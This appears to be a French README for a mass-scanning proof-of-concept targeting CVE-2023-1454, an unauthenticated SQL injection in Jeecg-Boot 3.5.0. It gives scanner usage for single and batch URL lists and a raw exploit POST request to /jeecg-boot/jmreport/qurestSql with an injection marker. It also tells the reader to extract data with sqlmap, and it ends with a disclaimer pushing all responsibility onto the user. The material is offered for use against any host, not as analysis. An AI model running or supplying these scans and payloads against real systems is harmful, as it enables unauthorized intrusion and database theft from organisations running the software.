
jmreport/qurestSql poc de scan en masse d'injections SQL non autorisées
POC de scan en masse d'injection SQL non autorisée pour jmreport/qurestSql Jeecg-Boot est une plateforme de développement rapide basée sur Spring Boot et Jeecg-Boot-Plus. De multiples vulnérabilités d'injection SQL ont été découvertes dans la dernière version jeecg-boot 3.5.0.
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 Test d'une seule URL
python3 CVE-2023-1454-scan.py -f url.txt Détection par lots
Après la numérisation, un fichier vuln.txt contenant les URL vulnérables sera généré dans le répertoire courant.
POC :

EXP :
Enregistrez le paquet en tant que fichier txt et utilisez sqlmap pour obtenir les données.
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Toute conséquence ou perte directe ou indirecte résultant de la diffusion ou de l'utilisation des informations fournies dans ce document relèvent de la seule responsabilité de l'utilisateur. L'auteur n'assume aucune responsabilité à cet égard.